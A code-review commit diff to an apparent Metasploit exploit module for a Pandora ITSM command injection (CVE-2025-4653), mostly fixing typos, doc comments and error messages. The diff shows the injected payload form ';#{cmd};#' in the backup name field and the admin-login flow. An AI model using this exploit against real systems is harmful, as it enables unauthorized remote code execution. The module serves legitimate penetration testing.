update module + documentation based on review comments

Author: h00die-gr3y

documentation/modules/exploit/linux/http/pandora_itsm_auth_rce_cve_2025_4653.md

@@ -1,10 +1,10 @@
 ## Vulnerable Application
 Pandora ITSM is a platform for Service Management & Support including a Helpdesk for support
 and customer service teams, aligned with ITIL processes.
-This module exploits an command injection vulnerability in the `name` backup setting at the
+This module exploits a command injection vulnerability in the `name` backup setting at the
 application setup page of Pandora ITSM. This can be triggered by generating a backup with a
-malcious payload injected at the `name` parameter.
-You need have admin access at the Pandora ITSM  Web application in order to execute this RCE.
+malicious payload injected at the `name` parameter.
+You need to have admin access at the Pandora ITSM  Web application in order to execute this RCE.
 This access can be achieved by knowing the admin credentials to access the web application or
 leveraging a default password vulnerability in Pandora ITSM that allows an attacker to access
 the Pandora FMS ITSM database, create a new admin user and gain administrative access to the

modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb

@@ -25,10 +25,10 @@ def initialize(info = {})
         'Description' => %q{
           Pandora ITSM is a platform for Service Management & Support including a Helpdesk for support
           and customer service teams, aligned with ITIL processes.
-          This module exploits an command injection vulnerability in the `name` backup setting at the
+          This module exploits a command injection vulnerability in the `name` backup setting at the
           application setup page of Pandora ITSM. This can be triggered by generating a backup with a
-          malcious payload injected at the `name` parameter.
-          You need have admin access at the Pandora ITSM  Web application in order to execute this RCE.
+          malicious payload injected at the `name` parameter.
+          You need to have admin access at the Pandora ITSM  Web application in order to execute this RCE.
           This access can be achieved by knowing the admin credentials to access the web application or
           leveraging a default password vulnerability in Pandora ITSM that allows an attacker to access
           the Pandora FMS ITSM database, create a new admin user and gain administrative access to the
@@ -91,15 +91,20 @@ def initialize(info = {})
   end
 
   # MySQL login
-  # returns true if successful else false
+  # @param [String] host
+  # @param [String] user
+  # @param [String] password
+  # @param [String] db
+  # @param [String] port
+  # @return [TrueClass|FalseClass] true if login successful, else false
   def mysql_login(host, user, password, db, port)
     begin
       self.mysql_client = ::Rex::Proto::MySQL::Client.connect(host, user, password, db, port)
     rescue Errno::ECONNREFUSED
-      print_error('Connection refused')
+      print_error('MySQL connection refused')
       return false
     rescue ::Rex::Proto::MySQL::Client::ClientError
-      print_error('Connection timedout')
+      print_error('MySQL connection timedout')
       return false
     rescue Errno::ETIMEDOUT
       print_error('Operation timedout')
@@ -108,7 +113,7 @@ def mysql_login(host, user, password, db, port)
       print_error('Unable to login from this host due to policy')
       return false
     rescue ::Rex::Proto::MySQL::Client::AccessDeniedError
-      print_error('Access denied')
+      print_error('MySQL Access denied')
       return false
     rescue StandardError => e
       print_error("Unknown error: #{e.message}")
@@ -118,7 +123,8 @@ def mysql_login(host, user, password, db, port)
   end
 
   # MySQL query
-  # returns query result if successful (can be nil) else returns false
+  # @param [String] sql
+  # @return [query|nil|FalseClass] if sql query successful (can be nil), else false
   def mysql_query(sql)
     begin
       res = mysql_client.query(sql)
@@ -136,7 +142,9 @@ def mysql_query(sql)
   end
 
   # login at the Pandora ITSM web application
-  # return true if login successful else false
+  # @param [String] name
+  # @param [String] pwd
+  # @return [TrueClass|FalseClass] true if login successful, else false
   def pandoraitsm_login(name, pwd)
     res = send_request_cgi!({
       'method' => 'POST',
@@ -155,8 +163,8 @@ def pandoraitsm_login(name, pwd)
   end
 
   # CVE-2025-4653: Command Injection leading to RCE via the backup "name" parameter triggered by the backup function
-  def execute_command(cmd, _opts = {})
-    @rce_payload = ";#{cmd};"
+  def execute_payload(cmd)
+    @rce_payload = ";#{cmd};#"
     vprint_status("RCE payload: #{@rce_payload}")
     @clean_payload = true
     send_request_cgi({
@@ -232,7 +240,7 @@ def clean_rce_payload(payload)
       success = false unless res&.code == 200 && !res.body.include?(id_bk_param.to_s)
     end
     if success
-      print_good('Payload entries successful removed from backup list.')
+      print_good('Payload entries successfully removed from backup list.')
     else
       print_warning('Payload entries might not be removed from backup list. Check and try to clean it manually.')
     end
@@ -319,13 +327,13 @@ def exploit
       print_status("Trying to log in with new admin credentials #{username}:#{password} at the Pandora ITSM Web application.")
       fail_with(Failure::NoAccess, 'Failed to authenticate at the Pandora ITSM Web application.') unless pandoraitsm_login(username, password)
     end
-    print_status('Succesfully authenticated at the Pandora ITSM Web application.')
+    print_status('Successfully authenticated at the Pandora ITSM Web application.')
 
     # storing credentials at the msf database
-    print_status('Saving admin credentials at the msf database.')
+    print_status('Saving admin credentials to the msf database.')
     store_valid_credential(user: username, private: password)
 
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
-    execute_command(payload.encoded)
+    execute_payload(payload.encoded)
   end
 end